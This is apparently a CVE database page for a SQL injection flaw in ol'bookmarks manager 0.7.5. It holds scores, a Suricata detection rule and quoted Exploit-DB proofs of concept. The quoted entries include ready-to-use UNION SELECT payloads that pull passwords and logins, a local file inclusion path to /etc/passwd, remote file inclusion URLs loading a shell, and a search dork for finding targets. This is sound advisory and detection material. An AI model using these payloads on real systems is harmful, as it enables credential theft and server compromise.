CVE-2008-6409
published 2009-03-06CVE-2008-6409: SQL injection vulnerability in index.php in ol'bookmarks manager 0.7.5 allows remote attackers to execute arbitrary SQL commands via the id parameter in a…
PriorityP340high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
0.94%
56.3th percentile
SQL injection vulnerability in index.php in ol'bookmarks manager 0.7.5 allows remote attackers to execute arbitrary SQL commands via the id parameter in a brain action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| brian_wilson | ol_bookmarks | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
ET WEB_SPECIFIC_APPS AvailScript Article Script articles.php aIDS Parameter SQL Injection
suricata·2010-07-30·CVSS 7.5
CVE-2008-4371 [HIGH] ET WEB_SPECIFIC_APPS AvailScript Article Script articles.php aIDS Parameter SQL Injection
ET WEB_SPECIFIC_APPS AvailScript Article Script articles.php aIDS Parameter SQL Injection
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS AvailScript Article Script articles.php aIDS Parameter SQL Injection"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/articles.php?"; nocase; content:"aIDS="; nocase; content:"UNION"; nocase; content:"SELECT"; nocase; distance:0; reference:cve,CVE-2008-4371; reference:url,secunia.com/advisories/31816/; reference:url,milw0rm.com/exploits/6409; classtype:web-application-attack; sid:2009747; rev:8; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, signature_severity Major, tag SQL_Injection, updated_at 2024_03_06, mitre_t
Exploit-DB
Ol BookMarks Manager 0.7.5 - Local File Inclusion / Remote File Inclusion / SQL Injection
exploitdb·2008-09-24
CVE-2008-6409 Ol BookMarks Manager 0.7.5 - Local File Inclusion / Remote File Inclusion / SQL Injection
Ol BookMarks Manager 0.7.5 - Local File Inclusion / Remote File Inclusion / SQL Injection
---
#########################################
Ol Bookmarks Manager 0.7.5 RFI / LFI / SQL Injection Vulnerabilities
#########################################
POC & Vulns
RFI In (frame.php) In Line 46
include "$_GET[framefile]";
#########################################
Ex : /frame.php?framefile=[Shell]
#########################################
LFI In (/read/frame.php) In Line 46
include "../$_GET[framefile]";
#########################################
Ex : /frame.php?framefile=../../../../../../etc/passwd
#########################################
SQL Injection In /read/index.php?name=brian&id=
Ex : /read/index.php?name=brian&id=-0000008+union+select+1,2,3,4,password,login,7,8,9,10,12,11,13+from+prefer
Exploit-DB
Ol BookMarks Manager 0.7.4 - 'root' Remote File Inclusion
exploitdb·2007-05-21
CVE-2008-6409 Ol BookMarks Manager 0.7.4 - 'root' Remote File Inclusion
Ol BookMarks Manager 0.7.4 - 'root' Remote File Inclusion
---
#Olbookmarks =>0.7.4 multiple RFI (root)
Download script :
#D0rk : allintitle:ol'bookmarks
#Thanks Str0ke
#Exploit : http://mesh.dl.sourceforge.net/sourceforge/olbookmarks/olbookmarks-0.7.4.tar.gz
#http://victime.com/olbookmarks-0.7.4/themes/test1.php?root=shell
#http://victime.com/path/themes/blackorange.php?root=shell
#http://victime.com/path/theme/default.php?root=shell
#http://victime.com/path/theme/frames1.php?root=shell
#http://victime.com/path/theme/frames1_top.php?root=shell
#http://victime.com/path/theme/test1.php?root=shell
#http://victime.com/path/theme/test2.php?root=shell
#http://victime.com/path/theme/test3.php?root=shell
#http://victime.com/path/theme/test4.php?root=shell
#http://victime.com/path/t
Exploit-DB
Ol BookMarks Manager 0.7.4 - SQL Injection
exploitdb·2007-05-21
CVE-2008-6409 Ol BookMarks Manager 0.7.4 - SQL Injection
Ol BookMarks Manager 0.7.4 - SQL Injection
---
Ol Bookmarks Manager 0.7.4 (root) Remote SQL Injection Vulnerabilities
Found by: Cyber-Security
D0rk : allintitle:ol'bookmarks
Download: http://mesh.dl.sourceforge.net/sourceforge/olbookmarks/olbookmarks-0.7.4.tar.gz
/read/index.php?name=alex&id=-1/**/union/**/select/**/0,1,2,3,4,5,password,login,8,9,10,11,12/**/from/**/preferences/*
Example: http://www.blex.co.uk/bookmarks
thanx: ThE TiGeR couse he found RFI to this script:)
# milw0rm.com [2007-05-21]
No writeups or analysis indexed.
2009-03-06
Published